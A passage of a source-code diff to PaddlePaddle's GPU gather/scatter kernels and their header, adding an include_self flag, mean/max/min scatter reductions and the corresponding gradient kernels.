phi::DeviceContext& ctx) { + gpu_gather_scatter_functor()( + self, dim, index, src, "scatter_mean_gpu", reduce_add, include_self, ctx); +} + +template +void gpu_scatter_max_kernel(phi::DenseTensor self, + int dim, + const phi::DenseTensor& index, + phi::DenseTensor src, + bool include_self, const phi::DeviceContext& ctx) { gpu_gather_scatter_functor()( - self, dim, index, src, "scatter_mul_gpu", reduce_mul, ctx); + self, dim, index, src, "scatter_max_gpu", reduce_max, include_self, ctx); +} + +template +void gpu_scatter_min_kernel(phi::DenseTensor self, + int dim, + const phi::DenseTensor& index, + phi::DenseTensor src, + bool include_self, + const phi::DeviceContext& ctx) { + gpu_gather_scatter_functor()( + self, dim, index, src, "scatter_min_gpu", reduce_min, include_self, ctx); } template @@ -347,6 +579,7 @@ void gpu_scatter_input_grad_kernel(phi::DenseTensor self, int dim, const phi::DenseTensor& index, phi::DenseTensor grad, + bool include_self UNUSED, const phi::DeviceContext& ctx) { auto* index_data = index.data(); auto* grad_data = grad.data(); @@ -374,17 +607,265 @@ void gpu_scatter_input_grad_kernel(phi::DenseTensor self, int64_t n = inner_dim_size * select_dim_size * outer_dim_size; int64_t grid = (n + block - 1) / block; auto stream = reinterpret_cast(ctx).stream(); - int shared_mem_size = sizeof(int) * grad_size; ScatterInputGradGPUKernel - <<>>(grad_data, - dim, - index_data, - select_dim_size, - grad_select_dim_size, - outer_dim_size, - outer_dim_size_data, - index_size, - grad_size); + <<>>(grad_data, + dim, + index_data, + select_dim_size, + grad_select_dim_size, + outer_dim_size, + outer_dim_size_data, + index_size, + grad_size); +} + +template +__global__ void ScatterMulInputGradGPUKernel(tensor_t* grad_data, + int dim, + const index_t* index_data, + const tensor_t* out_data, + const tensor_t* x_data, + int select_dim_size, + int grad_select_dim_size, + int64_t outer_dim_size, + int64_t outer_dim_size_grad, + int64_t numel, + int64_t numel_grad, + int* thread_ids) { + int tid = threadIdx.x + blockIdx.x * blockDim.x; + if (tid >= numel) return; + int64_t i, j, k; + i = tid / (select_dim_size * outer_dim_size); + int64_t remind = tid % (select_dim_size * outer_dim_size); + j = remind / outer_dim_size; + k = remind % outer_dim_size; + index_t index = index_data[tid]; + int64_t replace_index = k + index * outer_dim_size_grad + + i * outer_dim_size_grad * grad_select_dim_size; + atomicMax(thread_ids + replace_index, tid); + __syncthreads(); + if (tid == thread_ids[replace_index]) { + grad_data[replace_index] = grad_data[replace_index] * + out_data[replace_index] / x_data[replace_index]; + } +} + +template +__global__ void ScatterMinMaxInputGradGPUKernel(tensor_t* grad_data, + int dim, + const index_t* index_data, + const tensor_t* out_data, + const tensor_t* x_data, + const tensor_t* value_data, + const tensor_t* self_data, + int select_dim_size, + int grad_select_dim_size, + int value_select_dim_size, + int64_t outer_dim_size, + int64_t outer_dim_size_grad, + int64_t outer_dim_size_value, + int64_t numel, + int64_t numel_grad, + const std::string& reduce, + int* shared_mem) { + int tid = threadIdx.x + blockIdx.x * blockDim.x; + if (tid >= numel) return; + int64_t i, j, k; + i = tid / (select_dim_size * outer_dim_size); + int64_t remind = tid % (select_dim_size * outer_dim_size); + j = remind / outer_dim_size; + k = remind % outer_dim_size; + index_t index = index_data[tid]; + int64_t replace_index = k + index * outer_dim_size_grad + + i * outer_dim_size_grad * 
grad_select_dim_size; + int64_t replace_index_value = + k + j * outer_dim_size_value + + i * outer_dim_size_value * value_select_dim_size; + if (value_data[replace_index_value] == out_data[replace_index]) + phi::CudaAtomicAdd(shared_mem + replace_index, 1); + __syncthreads(); + if (out_data[replace_index] != x_data[replace_index]) { + grad_data[replace_index] = 0; + } else { + grad_data[replace_index] = self_data[replace_index] / + static_cast(shared_mem[replace_index]); + } +} + +template +void gpu_scatter_mul_min_max_input_grad_kernel(phi::DenseTensor self, + int dim, + const phi::DenseTensor& index, + const phi::DenseTensor& out, + const phi::DenseTensor& x, + const phi::DenseTensor& value + UNUSED, + phi::DenseTensor grad, + const std::string& reduce, + bool include_self UNUSED, + const phi::DeviceContext& ctx) { + auto* index_data = index.data(); + auto* grad_data = grad.data(); + auto* out_data = out.data(); + auto* x_data = x.data(); + auto* value_data = value.data(); + auto* self_data = self.data(); + + int64_t grad_size = grad.numel(); + int64_t index_size = index.numel(); + auto index_dims = index.dims(); + auto grad_dims = grad.dims(); + auto x_dims = x.dims(); + auto value_dims = value.dims(); + + int64_t inner_dim_size = 1; + int64_t outer_dim_size = 1; + int64_t outer_dim_size_grad = 1; + int64_t outer_dim_size_value = 1; + int64_t select_dim_size = index_dims[dim]; + int64_t grad_select_dim_size = grad_dims[dim]; + int64_t value_select_dim_size = grad_dims[dim]; + for (int i = 0; i < dim; ++i) { + inner_dim_size *= index_dims[i]; + } + + for (int i = dim + 1; i < index_dims.size(); i++) { + outer_dim_size *= index_dims[i]; + outer_dim_size_grad *= grad_dims[i]; + outer_dim_size_value *= value_dims[i]; + } + int block = 512; + int64_t n = inner_dim_size * select_dim_size * outer_dim_size; + int64_t grid = (n + block - 1) / block; + auto stream = reinterpret_cast(ctx).stream(); + DenseTensor shared_mem_tensor; + shared_mem_tensor.Resize({grad_size}); + ctx.Alloc(&shared_mem_tensor); + int* shared_mem = shared_mem_tensor.data(); + if (reduce == "mul" || reduce == "multiply") { + phi::funcs::set_constant(ctx, &shared_mem_tensor, 0); + ScatterMulInputGradGPUKernel + <<>>(grad_data, + dim, + index_data, + out_data, + x_data, + select_dim_size, + grad_select_dim_size, + outer_dim_size, + outer_dim_size_grad, + index_size, + grad_size, + shared_mem); + } else if (reduce == "amin" || reduce == "amax") { + phi::funcs::set_constant(ctx, &shared_mem_tensor, 1); + ScatterMinMaxInputGradGPUKernel + <<>>(grad_data, + dim, + index_data, + out_data, + x_data, + value_data, + self_data, + select_dim_size, + grad_select_dim_size, + value_select_dim_size, + outer_dim_size, + outer_dim_size_grad, + outer_dim_size_value, + index_size, + grad_size, + reduce, + shared_mem); + } +} + +template +__global__ void ScatterMeanInputGradGPUKernel(tensor_t* grad_data, + int dim, + const index_t* index_data, + int select_dim_size, + int grad_select_dim_size, + int64_t outer_dim_size, + int64_t outer_dim_size_grad, + int64_t numel, + int64_t numel_grad, + int* shared_mem) { + int tid = threadIdx.x + blockIdx.x * blockDim.x; + if (tid >= numel) return; + int64_t i, j, k; + i = tid / (select_dim_size * outer_dim_size); + int64_t remind = tid % (select_dim_size * outer_dim_size); + j = remind / outer_dim_size; + k = remind % outer_dim_size; + index_t index = index_data[tid]; + int64_t replace_index = k + index * outer_dim_size_grad + + i * outer_dim_size_grad * grad_select_dim_size; + atomicMax(shared_mem + 
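For amin/amax the gradient flows only to contributors that equal the reduced output, and the upstream gradient is split evenly among the ties (the kernels above count the ties with an atomic add). A host-side sketch of that rule, ignoring the include_self term for brevity:

#include <cstdio>
#include <vector>

int main() {
  std::vector<float> value = {3.f, 5.f, 5.f, 1.f};  // all scatter to one slot
  float out = 5.f;          // amax of the contributions
  float upstream = 1.2f;    // d(loss)/d(out)

  int ties = 0;
  for (float v : value)
    if (v == out) ++ties;

  // Only the tying contributions receive gradient, each an equal share.
  std::vector<float> grad(value.size(), 0.f);
  for (size_t i = 0; i < value.size(); ++i)
    if (value[i] == out) grad[i] = upstream / ties;

  for (float g : grad) printf("%f ", g);  // 0 0.6 0.6 0
  printf("\n");
  return 0;
}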
replace_index, tid); + phi::CudaAtomicAdd(shared_mem + numel_grad + replace_index, 1); + __syncthreads(); + if (tid == shared_mem[replace_index]) { + grad_data[replace_index] = + grad_data[replace_index] / + static_cast(shared_mem[numel_grad + replace_index]); + } +} + +template +void gpu_scatter_mean_input_grad_kernel(phi::DenseTensor self, + int dim, + const phi::DenseTensor& index, + phi::DenseTensor grad, + bool include_self UNUSED, + const phi::DeviceContext& ctx) { + auto* index_data = index.data(); + auto* grad_data = grad.data(); + + auto index_dims = index.dims(); + auto grad_dims = grad.dims(); + + int64_t grad_size = grad.numel(); + int64_t index_size = index.numel(); + + int64_t inner_dim_size = 1; + int64_t outer_dim_size = 1; + int64_t outer_dim_size_grad = 1; + int64_t select_dim_size = index_dims[dim]; + int64_t grad_select_dim_size = grad_dims[dim]; + for (int i = 0; i < dim; ++i) { + inner_dim_size *= index_dims[i]; + } + + for (int i = dim + 1; i < index_dims.size(); i++) { + outer_dim_size *= index_dims[i]; + outer_dim_size_grad *= grad_dims[i]; + } + + DenseTensor shared_mem_tensor; + shared_mem_tensor.Resize({grad_size * 2}); + ctx.Alloc(&shared_mem_tensor); + phi::funcs::set_constant(ctx, &shared_mem_tensor, 0); + int* shared_mem = shared_mem_tensor.data(); + + int block = 512; + int64_t grid_memset = (grad_size + block - 1) / block; + auto stream = reinterpret_cast(ctx).stream(); + CudaMemsetAsync<<>>( + shared_mem + grad_size, 1, sizeof(int) * grad_size); + + int64_t n = inner_dim_size * select_dim_size * outer_dim_size; + int64_t grid = (n + block - 1) / block; + ScatterMeanInputGradGPUKernel + <<>>(grad_data, + dim, + index_data, + select_dim_size, + grad_select_dim_size, + outer_dim_size, + outer_dim_size_grad, + index_size, + grad_size, + shared_mem); } template @@ -399,17 +880,11 @@ __global__ void ScatterValueGradGPUKernel(tensor_t* grad_data, int64_t outer_dim_size_self, int64_t outer_dim_size_grad, int64_t numel, - int64_t numel_data) { + int64_t numel_data, + int* thread_ids) { int tid = threadIdx.x + blockIdx.x * blockDim.x; if (tid >= numel) return; - extern __shared__ int thread_ids[]; - if (tid == 0) { - for (int i = 0; i < numel_data; i++) { - thread_ids[i] = 0; - } - } - __syncthreads(); int64_t i, j, k; i = tid / (select_dim_size * outer_dim_size); int64_t remind = tid % (select_dim_size * outer_dim_size); @@ -418,7 +893,6 @@ __global__ void ScatterValueGradGPUKernel(tensor_t* grad_data, index_t index = index_data[tid]; int64_t replace_index_self = k + index * outer_dim_size_self + i * outer_dim_size_self * self_select_dim_size; - atomicMax(thread_ids + replace_index_self, tid); __syncthreads(); @@ -433,6 +907,7 @@ void gpu_scatter_value_grad_kernel(phi::DenseTensor self, int dim, const phi::DenseTensor& index, phi::DenseTensor grad, + bool include_self UNUSED, const phi::DeviceContext& ctx) { auto* self_data = self.data(); auto* index_data = index.data(); @@ -461,30 +936,362 @@ void gpu_scatter_value_grad_kernel(phi::DenseTensor self, outer_dim_size_grad *= grad_dims[i]; } + DenseTensor shared_mem_tensor; + shared_mem_tensor.Resize({self_size}); + ctx.Alloc(&shared_mem_tensor); + phi::funcs::set_constant(ctx, &shared_mem_tensor, 0); + int* shared_mem = shared_mem_tensor.data(); + int block = 512; int64_t n = inner_dim_size * select_dim_size * outer_dim_size; int64_t grid = (n + block - 1) / block; auto stream = reinterpret_cast(ctx).stream(); - int shared_mem_size = sizeof(int) * self_size; ScatterValueGradGPUKernel - <<>>(grad_data, - dim, - 
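The mean variants follow an accumulate, count, normalize pattern: sum the contributions per destination slot, count them (including the original value when include_self is true), then divide. A CPU sketch with illustrative data:

#include <cstdio>
#include <vector>

int main() {
  // Two sources scatter into slot 0 and one into slot 1.
  std::vector<float> self = {10.f, 20.f};        // original values
  std::vector<int> index = {0, 0, 1};
  std::vector<float> src = {1.f, 3.f, 5.f};

  std::vector<float> sum = self;                 // include_self == true
  std::vector<int> count(self.size(), 1);        // self counts as one term
  for (size_t i = 0; i < src.size(); ++i) {
    sum[index[i]] += src[i];
    count[index[i]] += 1;
  }
  for (size_t s = 0; s < sum.size(); ++s)
    sum[s] /= count[s];

  // (10+1+3)/3 = 4.666667 and (20+5)/2 = 12.5
  printf("%f %f\n", sum[0], sum[1]);
  return 0;
}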
self_data, - index_data, - select_dim_size, - self_select_dim_size, - grad_select_dim_size, - outer_dim_size, - outer_dim_size_self, - outer_dim_size_grad, - index_size, - self_size); + <<>>(grad_data, + dim, + self_data, + index_data, + select_dim_size, + self_select_dim_size, + grad_select_dim_size, + outer_dim_size, + outer_dim_size_self, + outer_dim_size_grad, + index_size, + self_size, + shared_mem); +} + +template +__global__ void ScatterMeanValueGradGPUKernel(tensor_t* grad_data, + int dim, + const tensor_t* self_data, + const index_t* index_data, + int select_dim_size, + int self_select_dim_size, + int grad_select_dim_size, + int64_t outer_dim_size, + int64_t outer_dim_size_self, + int64_t outer_dim_size_grad, + int64_t numel, + int64_t numel_self, + int* shared_mem) { + int tid = threadIdx.x + blockIdx.x * blockDim.x; + if (tid >= numel) return; + + int64_t i, j, k; + i = tid / (select_dim_size * outer_dim_size); + int64_t remind = tid % (select_dim_size * outer_dim_size); + j = remind / outer_dim_size; + k = remind % outer_dim_size; + index_t index = index_data[tid]; + int64_t replace_index_self = k + index * outer_dim_size_self + + i * outer_dim_size_self * self_select_dim_size; + + phi::CudaAtomicAdd(shared_mem + replace_index_self, 1); + __syncthreads(); + + int64_t replace_index_grad = k + j * outer_dim_size_grad + + i * outer_dim_size_grad * grad_select_dim_size; + grad_data[replace_index_grad] = + self_data[replace_index_self] / + static_cast(shared_mem[replace_index_self]); +} + +template +__global__ void ScatterAddValueGradGPUKernel(tensor_t* grad_data, + int dim, + const tensor_t* self_data, + const index_t* index_data, + int select_dim_size, + int self_select_dim_size, + int grad_select_dim_size, + int64_t outer_dim_size, + int64_t outer_dim_size_self, + int64_t outer_dim_size_grad, + int64_t numel) { + int tid = threadIdx.x + blockIdx.x * blockDim.x; + if (tid >= numel) return; + int64_t i, j, k; + i = tid / (select_dim_size * outer_dim_size); + int64_t remind = tid % (select_dim_size * outer_dim_size); + j = remind / outer_dim_size; + k = remind % outer_dim_size; + index_t index = index_data[tid]; + int64_t replace_index_self = k + index * outer_dim_size_self + + i * outer_dim_size_self * self_select_dim_size; + int64_t replace_index_grad = k + j * outer_dim_size_grad + + i * outer_dim_size_grad * grad_select_dim_size; + grad_data[replace_index_grad] = self_data[replace_index_self]; +} + +template +void gpu_scatter_add_mean_value_grad_kernel( + phi::DenseTensor self, + int dim, + const phi::DenseTensor& index, + const phi::DenseTensor& out UNUSED, + const phi::DenseTensor& x UNUSED, + const phi::DenseTensor& value UNUSED, + phi::DenseTensor grad, + const std::string& reduce, + bool include_self, + const phi::DeviceContext& ctx UNUSED) { + auto* self_data = self.data(); + auto* index_data = index.data(); + auto* grad_data = grad.data(); + + auto index_dims = index.dims(); + auto self_dims = self.dims(); + auto grad_dims = grad.dims(); + + int64_t self_size = self.numel(); + int64_t grad_size = grad.numel(); + int64_t index_size = index.numel(); + + int64_t inner_dim_size = 1; + int64_t outer_dim_size = 1; + int64_t outer_dim_size_self = 1; + int64_t outer_dim_size_grad = 1; + int64_t select_dim_size = index_dims[dim]; + int64_t self_select_dim_size = self_dims[dim]; + int64_t grad_select_dim_size = grad_dims[dim]; + for (int i = 0; i < dim; ++i) { + inner_dim_size *= index_dims[i]; + } + + for (int i = dim + 1; i < index_dims.size(); i++) { + outer_dim_size *= 
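For reduce == "add" the gradient with respect to value is simply the upstream gradient gathered at each scattered location, which is what ScatterAddValueGradGPUKernel computes; for "mean" the same gather is additionally divided by the per-slot count. A small sketch of the add case:

#include <cstdio>
#include <vector>

int main() {
  std::vector<float> grad_out = {0.5f, 2.0f};    // gradient w.r.t. the output
  std::vector<int> index = {1, 0, 1};            // where each value was added

  // d(out[index[i]]) / d(value[i]) == 1 for "add", so the value gradient
  // is a gather of the upstream gradient.
  std::vector<float> value_grad(index.size());
  for (size_t i = 0; i < index.size(); ++i)
    value_grad[i] = grad_out[index[i]];

  for (float g : value_grad) printf("%f ", g);   // 2.0 0.5 2.0
  printf("\n");
  return 0;
}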
index_dims[i]; + outer_dim_size_self *= self_dims[i]; + outer_dim_size_grad *= grad_dims[i]; + } + int block = 512; + int64_t n = inner_dim_size * select_dim_size * outer_dim_size; + int64_t grid = (n + block - 1) / block; + auto stream = reinterpret_cast(ctx).stream(); + if (reduce == "mean") { + DenseTensor shared_mem_tensor; + shared_mem_tensor.Resize({self_size}); + ctx.Alloc(&shared_mem_tensor); + if (include_self) { + phi::funcs::set_constant(ctx, &shared_mem_tensor, 1); + } else { + phi::funcs::set_constant(ctx, &shared_mem_tensor, 0); + } + int* shared_mem = shared_mem_tensor.data(); + ScatterMeanValueGradGPUKernel + <<>>(grad_data, + dim, + self_data, + index_data, + select_dim_size, + self_select_dim_size, + grad_select_dim_size, + outer_dim_size, + outer_dim_size_self, + outer_dim_size_grad, + index_size, + self_size, + shared_mem); + } else if (reduce == "add") { + ScatterAddValueGradGPUKernel + <<>>(grad_data, + dim, + self_data, + index_data, + select_dim_size, + self_select_dim_size, + grad_select_dim_size, + outer_dim_size, + outer_dim_size_self, + outer_dim_size_grad, + index_size); + } +} + +template +__global__ void ScatterMulValueGradGPUKernel(tensor_t* grad_data, + int dim, + const index_t* index_data, + const tensor_t* self_data, + const tensor_t* value_data, + const tensor_t* out_data, + int select_dim_size, + int self_select_dim_size, + int grad_select_dim_size, + int64_t outer_dim_size, + int64_t outer_dim_size_self, + int64_t outer_dim_size_grad, + int64_t numel) { + int tid = threadIdx.x + blockIdx.x * blockDim.x; + if (tid >= numel) return; + int64_t i, j, k; + i = tid / (select_dim_size * outer_dim_size); + int64_t remind = tid % (select_dim_size * outer_dim_size); + j = remind / outer_dim_size; + k = remind % outer_dim_size; + index_t index = index_data[tid]; + int64_t replace_index_self = k + index * outer_dim_size_self + + i * outer_dim_size_self * self_select_dim_size; + int64_t replace_index_grad = k + j * outer_dim_size_grad + + i * outer_dim_size_grad * grad_select_dim_size; + grad_data[replace_index_grad] = + self_data[replace_index_self] * + (out_data[replace_index_self] / value_data[replace_index_grad]); } -Instantiate_Template_Function(gpu_gather_kernel) - Instantiate_Template_Function(gpu_scatter_assign_kernel) - Instantiate_Template_Function(gpu_scatter_add_kernel) - Instantiate_Template_Function(gpu_scatter_mul_kernel) - Instantiate_Template_Function(gpu_scatter_input_grad_kernel) - Instantiate_Template_Function(gpu_scatter_value_grad_kernel) + +template +__global__ void ScatterMinMaxValueGradGPUKernel(tensor_t* grad_data, + int dim, + const index_t* index_data, + const tensor_t* self_data, + const tensor_t* value_data, + const tensor_t* out_data, + const tensor_t* x_data, + int select_dim_size, + int self_select_dim_size, + int grad_select_dim_size, + int64_t outer_dim_size, + int64_t outer_dim_size_self, + int64_t outer_dim_size_grad, + int64_t numel, + int64_t numel_self, + bool include_self, + int* shared_mem) { + int tid = threadIdx.x + blockIdx.x * blockDim.x; + if (tid >= numel) return; + int64_t i, j, k; + i = tid / (select_dim_size * outer_dim_size); + int64_t remind = tid % (select_dim_size * outer_dim_size); + j = remind / outer_dim_size; + k = remind % outer_dim_size; + index_t index = index_data[tid]; + int64_t replace_index_self = k + index * outer_dim_size_self + + i * outer_dim_size_self * self_select_dim_size; + int64_t replace_index_grad = k + j * outer_dim_size_grad + + i * outer_dim_size_grad * grad_select_dim_size; + if (tid 
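For reduce == "mul" the output of a slot is the product of its contributions, so the gradient with respect to each contribution is the product of all the others, computed above as out / value (valid only for non-zero values). A scalar sketch:

#include <cstdio>
#include <vector>

int main() {
  std::vector<float> value = {2.f, 3.f, 4.f};    // all multiplied into one slot
  float init = 1.f;                              // starting value of the slot
  float out = init;
  for (float v : value) out *= v;                // forward: out = 24

  float upstream = 1.f;                          // d(loss)/d(out)
  std::vector<float> grad(value.size());
  for (size_t i = 0; i < value.size(); ++i)
    grad[i] = upstream * (out / value[i]);       // product of the other factors

  for (float g : grad) printf("%f ", g);         // 12 8 6
  printf("\n");
  return 0;
}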
== 0) { + for (int i = 0; i < numel_self; i++) { + if (include_self && + x_data[replace_index_self] == out_data[replace_index_self]) + shared_mem[i] = 1; + else + shared_mem[i] = 0; // number of elements + } + } + __syncthreads(); + grad_data[replace_index_grad] = 0; + if (value_data[replace_index_grad] == out_data[replace_index_self]) + phi::CudaAtomicAdd(shared_mem + replace_index_self, 1); + __syncthreads(); + if (value_data[replace_index_grad] == out_data[replace_index_self]) + grad_data[replace_index_grad] = + self_data[replace_index_self] / + static_cast(shared_mem[replace_index_self]); +} + +template +void gpu_scatter_mul_min_max_value_grad_kernel(phi::DenseTensor self, + int dim, + const phi::DenseTensor& index, + const phi::DenseTensor& out, + const phi::DenseTensor& x, + const phi::DenseTensor& value, + phi::DenseTensor grad, + const std::string& reduce, + bool include_self, + const phi::DeviceContext& ctx) { + auto* self_data = self.data(); + auto* index_data = index.data(); + auto* grad_data = grad.data(); + auto* out_data = out.data(); + auto* x_data = x.data(); + auto* value_data = value.data(); + + auto index_dims = index.dims(); + auto self_dims = self.dims(); + auto grad_dims = grad.dims(); + + int64_t self_size = self.numel(); + int64_t index_size = index.numel(); + + int64_t inner_dim_size = 1; + int64_t outer_dim_size = 1; + int64_t outer_dim_size_self = 1; + int64_t outer_dim_size_grad = 1; + int64_t select_dim_size = index_dims[dim]; + int64_t self_select_dim_size = self_dims[dim]; + int64_t grad_select_dim_size = grad_dims[dim]; + for (int i = 0; i < dim; ++i) { + inner_dim_size *= index_dims[i]; + } + + for (int i = dim + 1; i < index_dims.size(); i++) { + outer_dim_size *= index_dims[i]; + outer_dim_size_self *= self_dims[i]; + outer_dim_size_grad *= grad_dims[i]; + } + int block = 512; + int64_t n = inner_dim_size * select_dim_size * outer_dim_size; + int64_t grid = (n + block - 1) / block; + auto stream = reinterpret_cast(ctx).stream(); + if (reduce == "mul" || reduce == "multiply") { + ScatterMulValueGradGPUKernel + <<>>(grad_data, + dim, + index_data, + self_data, + value_data, + out_data, + select_dim_size, + self_select_dim_size, + grad_select_dim_size, + outer_dim_size, + outer_dim_size_self, + outer_dim_size_grad, + index_size); + } else if (reduce == "amin" || reduce == "amax") { + DenseTensor shared_mem_tensor; + shared_mem_tensor.Resize({self_size}); + ctx.Alloc(&shared_mem_tensor); + + int* shared_mem = shared_mem_tensor.data(); + ScatterMinMaxValueGradGPUKernel + <<>>(grad_data, + dim, + index_data, + self_data, + value_data, + out_data, + x_data, + select_dim_size, + self_select_dim_size, + grad_select_dim_size, + outer_dim_size, + outer_dim_size_self, + outer_dim_size_grad, + index_size, + self_size, + include_self, + shared_mem); + } +} + +Instantiate_Template_Function(gpu_gather_kernel) // NOLINT + Instantiate_Template_Function(gpu_scatter_assign_kernel) // NOLINT + Instantiate_Template_Function(gpu_scatter_add_kernel) // NOLINT + Instantiate_Template_Function(gpu_scatter_mul_kernel) // NOLINT + Instantiate_Template_Function(gpu_scatter_min_kernel) // NOLINT + Instantiate_Template_Function(gpu_scatter_max_kernel) // NOLINT + Instantiate_Template_Function(gpu_scatter_mean_kernel) // NOLINT + Instantiate_Template_Function(gpu_scatter_input_grad_kernel) // NOLINT + Instantiate_Template_Function(gpu_scatter_value_grad_kernel) // NOLINT + Instantiate_Template_Function_With_Out( + gpu_scatter_mul_min_max_input_grad_kernel) // NOLINT + 
Instantiate_Template_Function(gpu_scatter_mean_input_grad_kernel) // NOLINT + Instantiate_Template_Function_With_Out( + gpu_scatter_add_mean_value_grad_kernel) // NOLINT + Instantiate_Template_Function_With_Out( + gpu_scatter_mul_min_max_value_grad_kernel) // NOLINT } // namespace funcs } // namespace phi diff --git a/paddle/phi/kernels/funcs/gather_scatter_functor.h b/paddle/phi/kernels/funcs/gather_scatter_functor.h index 054ccc196fcd00..9fc50c44a79ead 100644 --- a/paddle/phi/kernels/funcs/gather_scatter_functor.h +++ b/paddle/phi/kernels/funcs/gather_scatter_functor.h @@ -36,11 +36,46 @@ namespace funcs { int dim, \ const phi::DenseTensor& index, \ phi::DenseTensor result, \ + bool include_self, \ const phi::DeviceContext& ctx); \ template void func(phi::DenseTensor input, \ int dim, \ const phi::DenseTensor& index, \ phi::DenseTensor result, \ + bool include_self, \ + const phi::DeviceContext& ctx); + +#define Instantiate_Template_Function_With_Out(func) \ + Instantiate_Template_Function_index_t_With_Out(func, int) \ + Instantiate_Template_Function_index_t_With_Out(func, float) \ + Instantiate_Template_Function_index_t_With_Out(func, double) \ + Instantiate_Template_Function_index_t_With_Out(func, int64_t) \ + Instantiate_Template_Function_index_t_With_Out( \ + func, phi::dtype::float16) \ + Instantiate_Template_Function_index_t_With_Out( \ + func, phi::dtype::bfloat16) \ + Instantiate_Template_Function_index_t_With_Out( \ + func, unsigned char) +#define Instantiate_Template_Function_index_t_With_Out(func, tensor_t) \ + template void func(phi::DenseTensor input, \ + int dim, \ + const phi::DenseTensor& index, \ + const phi::DenseTensor& out, \ + const phi::DenseTensor& self, \ + const phi::DenseTensor& value, \ + phi::DenseTensor result, \ + const std::string& reduce, \ + bool include_self, \ + const phi::DeviceContext& ctx); \ + template void func(phi::DenseTensor input, \ + int dim, \ + const phi::DenseTensor& index, \ + const phi::DenseTensor& out, \ + const phi::DenseTensor& self, \ + const phi::DenseTensor& value, \ + phi::DenseTensor result, \ + const std::string& reduce, \ + bool include_self, \ const phi::DeviceContext& ctx); template @@ -48,6 +83,7 @@ void cpu_gather_kernel(phi::DenseTensor self, int dim, const phi::DenseTensor& index, phi::DenseTensor result, + bool include_self, const phi::DeviceContext& ctx); template @@ -55,6 +91,7 @@ void cpu_scatter_assign_kernel(phi::DenseTensor self, int dim, const phi::DenseTensor& index, phi::DenseTensor src, + bool include_self, const phi::DeviceContext& ctx); template @@ -62,6 +99,7 @@ void cpu_scatter_add_kernel(phi::DenseTensor self, int dim, const phi::DenseTensor& index, phi::DenseTensor src, + bool include_self, const phi::DeviceContext& ctx); template @@ -69,6 +107,31 @@ void cpu_scatter_mul_kernel(phi::DenseTensor self, int dim, const phi::DenseTensor& index, phi::DenseTensor src, + bool include_self, + const phi::DeviceContext& ctx); + +template +void cpu_scatter_mean_kernel(phi::DenseTensor self, + int dim, + const phi::DenseTensor& index, + phi::DenseTensor src, + bool include_self, + const phi::DeviceContext& ctx); + +template +void cpu_scatter_max_kernel(phi::DenseTensor self, + int dim, + const phi::DenseTensor& index, + phi::DenseTensor src, + bool include_self, + const phi::DeviceContext& ctx); + +template +void cpu_scatter_min_kernel(phi::DenseTensor self, + int dim, + const phi::DenseTensor& index, + phi::DenseTensor src, + bool include_self, const phi::DeviceContext& ctx); template @@ -76,20 +139,67 @@ void 
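The header relies on macros that stamp out explicit template instantiations for every supported tensor/index type pair, so the kernel definitions can stay in the .cc/.cu files while other translation units only see declarations. A reduced illustration of the pattern with placeholder names (fill_first, INSTANTIATE):

#include <cstdint>
#include <cstdio>

// Header side: declaration only.
template <typename tensor_t, typename index_t>
void fill_first(tensor_t* data, const index_t* index, tensor_t value);

// Source side: definition plus explicit instantiations, so callers link
// against these symbols without ever seeing the body.
template <typename tensor_t, typename index_t>
void fill_first(tensor_t* data, const index_t* index, tensor_t value) {
  data[index[0]] = value;
}

#define INSTANTIATE_FOR_INDEX(func, tensor_t)                            \
  template void func<tensor_t, int>(tensor_t*, const int*, tensor_t);    \
  template void func<tensor_t, int64_t>(tensor_t*, const int64_t*, tensor_t);

#define INSTANTIATE(func)            \
  INSTANTIATE_FOR_INDEX(func, float) \
  INSTANTIATE_FOR_INDEX(func, double)

INSTANTIATE(fill_first)

int main() {
  float data[2] = {0.f, 0.f};
  int index[1] = {1};
  fill_first(data, index, 7.f);
  printf("%f %f\n", data[0], data[1]);  // 0 7
  return 0;
}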
cpu_scatter_input_grad_kernel(phi::DenseTensor self, int dim, const phi::DenseTensor& index, phi::DenseTensor grad, + bool include_self, const phi::DeviceContext& ctx); +template +void cpu_scatter_mul_min_max_input_grad_kernel(phi::DenseTensor self, + int dim, + const phi::DenseTensor& index, + const phi::DenseTensor& out, + const phi::DenseTensor& x, + const phi::DenseTensor& value, + phi::DenseTensor grad, + const std::string& reduce, + bool include_self, + const phi::DeviceContext& ctx); + +template +void cpu_scatter_mean_input_grad_kernel(phi::DenseTensor self, + int dim, + const phi::DenseTensor& index, + phi::DenseTensor grad, + bool include_self, + const phi::DeviceContext& ctx); + template void cpu_scatter_value_grad_kernel(phi::DenseTensor self, int dim, const phi::DenseTensor& index, phi::DenseTensor grad, + bool include_self, const phi::DeviceContext& ctx); +template +void cpu_scatter_add_mean_value_grad_kernel(phi::DenseTensor self, + int dim, + const phi::DenseTensor& index, + const phi::DenseTensor& out, + const phi::DenseTensor& x, + const phi::DenseTensor& value, + phi::DenseTensor grad, + const std::string& reduce, + bool include_self, + const phi::DeviceContext& ctx); + +template +void cpu_scatter_mul_min_max_value_grad_kernel(phi::DenseTensor self, + int dim, + const phi::DenseTensor& index, + const phi::DenseTensor& out, + const phi::DenseTensor& x, + const phi::DenseTensor& value, + phi::DenseTensor grad, + const std::string& reduce, + bool include_self, + const phi::DeviceContext& ctx); + template void gpu_gather_kernel(phi::DenseTensor self, int dim, const phi::DenseTensor& index, phi::DenseTensor result, + bool include_self, const phi::DeviceContext& ctx); template @@ -97,6 +207,7 @@ void gpu_scatter_assign_kernel(phi::DenseTensor self, int dim, const phi::DenseTensor& index, phi::DenseTensor src, + bool include_self, const phi::DeviceContext& ctx); template @@ -104,6 +215,7 @@ void gpu_scatter_add_kernel(phi::DenseTensor self, int dim, const phi::DenseTensor& index, phi::DenseTensor src, + bool include_self, const phi::DeviceContext& ctx); template @@ -111,6 +223,31 @@ void gpu_scatter_mul_kernel(phi::DenseTensor self, int dim, const phi::DenseTensor& index, phi::DenseTensor src, + bool include_self, + const phi::DeviceContext& ctx); + +template +void gpu_scatter_mean_kernel(phi::DenseTensor self, + int dim, + const phi::DenseTensor& index, + phi::DenseTensor src, + bool include_self, + const phi::DeviceContext& ctx); + +template +void gpu_scatter_max_kernel(phi::DenseTensor self, + int dim, + const phi::DenseTensor& index, + phi::DenseTensor src, + bool include_self, + const phi::DeviceContext& ctx); + +template +void gpu_scatter_min_kernel(phi::DenseTensor self, + int dim, + const phi::DenseTensor& index, + phi::DenseTensor src, + bool include_self, const phi::DeviceContext& ctx); template @@ -118,14 +255,60 @@ void gpu_scatter_input_grad_kernel(phi::DenseTensor self, int dim, const phi::DenseTensor& index, phi::DenseTensor grad, + bool include_self, const phi::DeviceContext& ctx); +template +void 